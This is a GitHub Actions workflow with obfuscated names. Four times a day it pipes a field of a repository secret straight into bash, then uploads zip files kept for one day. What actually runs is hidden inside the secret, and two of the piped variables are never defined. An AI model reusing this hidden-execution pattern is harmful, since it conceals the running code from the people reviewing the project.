name: sixingyinghong
on:
  workflow_dispatch:

  schedule:
    - cron: '5 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sixingyinghong
        env:
          wcizs4: ${{ secrets.wcizs4 }}
        run: |
          printf '%s' "$wcizs4" | jq -r .hxcgn9206 | /bin/bash
          printf '%s' "$hx65" | jq -r .eawbk690 | /bin/bash
          printf '%s' "$u67" | jq -r .afe53776 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: abN46pCx
          path: "*.zip"
          retention-days: 1
